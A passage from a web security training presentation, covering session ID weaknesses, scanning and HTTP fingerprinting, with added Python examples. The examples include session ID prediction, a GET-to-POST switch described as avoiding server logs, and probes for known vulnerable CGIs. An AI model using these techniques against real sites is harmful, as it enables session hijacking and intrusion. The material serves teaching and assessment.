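            findings.append((row["name"], "persistent: survives browser close"))
    return findings
```

Base64 is an encoding, not encryption: anyone holding the cookie (sniffed, stolen through XSS, or read from cookies.txt) has the password, which is why the brute force on the slide needs no more than a wordlist and a Cookie header.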
124 Cookie/URL Example: Amazon.com
Some sites use the URL AND a cookie for authentication.

125 6 Common Problems
Weak Algorithm: many of the most popular web sites today use linear algorithms based on easily predictable variables such as time or IP address.
No Form of Account Lockout: with regard to Session ID brute force attacks, an attacker can probably try hundreds or thousands of Session IDs embedded in a legitimate URL without a single complaint from the web server.
Short Key Space: even the most cryptographically strong algorithm still allows an active Session ID to be easily determined if the string's key space is not sufficiently large.

126 6 Common Problems, Continued
Indefinite Expiration on Server: Session IDs that do not expire on the web server allow an attacker unlimited time to guess a valid Session ID.
Transmitted in the Clear: if SSL is not used while the Session ID cookie is transmitted to and from the browser, the Session ID can be sniffed on a flat network, taking the guesswork away from a miscreant. This is still a problem with proxy servers.
Insecure Retrieval: by tricking the user's browser into visiting another site, an attacker can retrieve stored Session ID information and quickly exploit it before the user's session expires. This can be done in a number of ways: DNS poisoning, cross-site scripting, etc.

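The first, third and fourth of the six problems, shown side by side in an added Python example (not from the presentation): a linear, time-seeded generator of the kind slide 125 describes, the one-line prediction it allows, a generator drawing 128 bits from the OS CSPRNG, the guess count each key space implies, and a server-side session table with idle and absolute expiry so that IDs do not live forever. The timeout values are assumptions.

```python
import secrets
import time


class WeakSessionIds:
    """Linear, time-seeded IDs of the kind slide 125 warns about: Unix time
    followed by a counter. One observed ID plus the clock predicts the rest."""

    def __init__(self, clock=time.time):
        self.clock = clock
        self.counter = 0

    def new(self) -> str:
        self.counter += 1
        return f"{int(self.clock()):010d}{self.counter:05d}"


def predict_next(observed: str) -> str:
    """What an attacker does with one weak ID: bump the counter."""
    stamp, counter = observed[:10], int(observed[10:])
    return f"{stamp}{counter + 1:05d}"


def strong_session_id(nbytes: int = 16) -> str:
    """128 bits from the OS CSPRNG, hex-encoded for a cookie or URL."""
    return secrets.token_hex(nbytes)


def expected_guesses(keyspace_bits: int, live_sessions: int) -> float:
    """Average guesses before hitting any one of the live IDs. A short key
    space or many live sessions both shrink this."""
    return 2 ** keyspace_bits / (2 * live_sessions)


class SessionStore:
    """Server-side session table with idle and absolute expiry, addressing
    'indefinite expiration on server'. Timeouts are assumed values."""

    def __init__(self, idle=15 * 60, absolute=8 * 3600, clock=time.time):
        self.idle, self.absolute, self.clock = idle, absolute, clock
        self._sessions = {}

    def create(self, user: str) -> str:
        """Issue a fresh ID at login; never reuse a pre-login ID."""
        sid = strong_session_id()
        now = self.clock()
        self._sessions[sid] = {"user": user, "created": now, "last": now}
        return sid

    def lookup(self, sid: str):
        """Return the user for a live session, or None (and forget it)."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self.clock()
        if now - s["created"] > self.absolute or now - s["last"] > self.idle:
            del self._sessions[sid]
            return None
        s["last"] = now
        return s["user"]

    def destroy(self, sid: str) -> None:
        """Logout must invalidate server-side, not just clear the cookie."""
        self._sessions.pop(sid, None)
```

Even a strong ID is only as good as its transport and storage: the secure cookie flag and SSL address "transmitted in the clear", and the expiry above limits the window for "insecure retrieval" through XSS or DNS poisoning.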
127 Tools
Session Auditor: www.idefense.com/idtools/Session_Auditor.zip
Visual Testing: WebSleuth
WebProxy
HTTPush: httpush.sourceforge.net
Achilles
MiniBrowser: aignes.com/download.htm

128 Why Automated Tools Don't Work Very Well
Some good things: completeness; large knowledge bases (at least potentially); puts web security assessment into the hands of anyone who calls themselves an "Information Security Expert".

129 Why Automated Tools Don't Work Very Well
Every programmer does things a little differently.
Authentication schemes are hard to automate.
Error codes are not standardized.
Sometimes simple things like SSL get in the way.

130 Why People are Better
Recognition of subtle errors.
We understand the impact, and therefore the risk, of a vulnerability.
We are grounded in the fundamentals of computer science and are therefore able to find "real" bugs: flaws in logic.

131 Web Hacking Accessories
Some helpful tools include:
A port scanner (Nmap et al.)
Netcat, the network Swiss Army knife
A vulnerability scanner: Whisker
OpenSSL source and documentation (OpenSSL, RFC 2246). The OpenSSL ssl library implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols and provides a rich, documented API.

132 New tools on the horizon...
Nikto: CGI scanner similar to whisker 1.4. Checks for CGIs, common directories and old versions; database frequently updated.
WHArsenal: set of CGIs that plug into an existing Apache install. Allows all kinds of requests while controlling/modifying request particulars.
@stake WebProxy: assessment proxy with full fuzzer/rewriting capabilities. Implemented in Java; supports Linux, Solaris and Windows.
Nessus: has a few new interesting web assessment plugins which do site crawling/mirroring and a few other interesting things.

133 Basic Training for Web Combat...
Port scanning: look for well-known TCP web ports: 80, 81, 443, 8000, 8080, etc.
Using FScan (from Foundstone): fscan -p 80,81,443,8000,
Using nmap (by Fyodor): nmap -p 80,81,443,8000,

134 Basic Training for Web Combat...
Fingerprinting HTTP: banner grabbing.
netcat as a TCP client (even telnet works): nc
HEAD / HTTP/1.0
Advanced HTTP methods: TRACE, OPTIONS, etc.
TRACE allows the client to see what is being received at the other end of the request chain and use that data for testing or diagnostic information. The value of the Via header field (RFC 2616 section 14.44) is of particular interest, since it acts as a trace of the request chain. Use of the Max-Forwards header field allows the client to limit the length of the request chain, which is useful for testing a chain of proxies forwarding messages in an infinite loop.
The OPTIONS method represents a request for information about the communication options available on the request/response chain identified by the Request-URI. This method allows the client to determine the options and/or requirements associated with a resource, or the capabilities of a server, without implying a resource action or initiating a resource retrieval.

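Slides 73, 75 and 134 all come down to writing raw HTTP by hand. The added Python example below (not from the presentation) builds HTTP/1.0 requests the way one would type them into netcat, performs the GET-to-POST method switch of slide 73 by moving the query string into the body, parses a raw response to pull the Server banner and the Allow header from an OPTIONS reply, and includes a plain socket sender for live use. The sample responses are constructed; no network access is needed to run the parsing functions.

```python
import socket
from urllib.parse import urlsplit

USER_AGENT = "Mozilla/4.75 [en] (Windows NT 5.0; U)"   # the UA string from slide 122


def build_request(method, url, body=None, extra_headers=()):
    """Raw HTTP/1.0 request text. HTTP/1.0 makes the server close the
    connection after one response, which is what 'nc host 80' relies on."""
    u = urlsplit(url)
    target = u.path or "/"
    if u.query:
        target += "?" + u.query
    lines = [f"{method} {target} HTTP/1.0", f"Host: {u.netloc}", f"User-Agent: {USER_AGENT}"]
    lines += list(extra_headers)
    if body is not None:
        lines += ["Content-Type: application/x-www-form-urlencoded",
                  f"Content-Length: {len(body.encode('iso-8859-1'))}"]
    return "\r\n".join(lines) + "\r\n\r\n" + (body or "")


def switch_to_post(url):
    """Method switching (slide 73): same parameters, but carried in a POST
    body that most servers of the period did not log."""
    u = urlsplit(url)
    bare = u._replace(query="").geturl()
    return build_request("POST", bare, body=u.query)


def parse_response(raw: bytes):
    """Split a raw response into (status, headers, body). Header names are
    lower-cased; HTTP headers are case-insensitive."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    _version, status, *_reason = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(status), headers, body


def fingerprint(raw: bytes):
    """Banner grabbing: the Server header and status from a HEAD response."""
    status, headers, _ = parse_response(raw)
    return headers.get("server"), status


def allowed_methods(raw: bytes):
    """Methods advertised in the Allow header of an OPTIONS response."""
    _, headers, _ = parse_response(raw)
    return [m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()]


def send_raw(host, port, request, timeout=5.0):
    """Send the request text over a plain TCP socket and read until close."""
    with socket.create_connection((host, port), timeout) as s:
        s.sendall(request.encode("iso-8859-1"))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# Constructed responses for offline use; not captured from any real server.
SAMPLE_HEAD_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/4.0\r\n"
    b"Content-Type: text/html\r\nContent-Length: 0\r\n\r\n"
)
SAMPLE_OPTIONS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nServer: Apache/1.3.27\r\n"
    b"Allow: GET, HEAD, POST, OPTIONS, TRACE\r\nContent-Length: 0\r\n\r\n"
)
```

A TRACE enabled in the `Allow` list is worth noting during assessment: the server echoes the request, including any Cookie header, back to the client.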
135 Basic Training for Web Combat...
Shaking the tree for the low-hanging fruit: scan using a database of known web vulnerabilities.
Whisker (by Rain Forest Puppy): ./whisker.pl -h I 1
cgichk.c <snip>
"GET /cgi-bin/phf HTTP/1.0\n\n";
"GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
"GET /cgi-bin/test-cgi HTTP/1.0\n\n";
"GET /cgi-bin/php.cgi HTTP/1.0\n\n";
ISS, Cybercop, Retina, etc.

136 el33t hax0r Training for Web Combat...
What about SSL? Some SSL myths:
"We are secure because we use SSL!"
"Strong 128-bit crypto is being used"
"We use digital certificates signed by VeriSign"

137 Proxy Over SSL
Using netcat and OpenSSL, it is possible to create a simple two-line SSL proxy: listen on port 80 on a host and redirect requests to port 443 on a remote host through SSL.
[Diagram: Web client -> nc (port 80) -> openssl -> SSL web server (port 443)]

138 Assessment Tools: Vulnerability scanners
Look for a known list of vulnerable applications or technologies.
Do not (cannot) engage/scan custom applications and configurations.
General vulnerability scanners: ISS, Cybercop, Nessus
Web-specific vulnerability scanners: WebInspect, whisker

139 Assessment tools: 'Proxy monitors'
HTTP proxy which monitors traffic, looking for web vulnerabilities as they pass.
Can analyze custom applications with the help of a user.
Examples: AppScan, RFProxy, HTTPush, Achilles

140 Root Causes of Web Hacks
Complex web architectures may cause oversights in web server configuration.
URL parsing.
File canonicalization.
The combination of underlying operating system and web server may leave holes.

141 Root Causes of Web Hacks
Untested code used in web applications, to save time.
Level of security consciousness is low among web application developers.
Security vs. convenience. Security vs. time-to-market.
Zero-knowledge administration breeds zero-knowledge administrators.
References:
iDEFENSE paper on Brute Forcing Session IDs (iDEFENSE site -> whitepapers)
CGI Security
WhiteHat Security
Web Application Security mailing list
MIT Cookie Eaters, "Dos and Don'ts of Client Authentication on the Web"

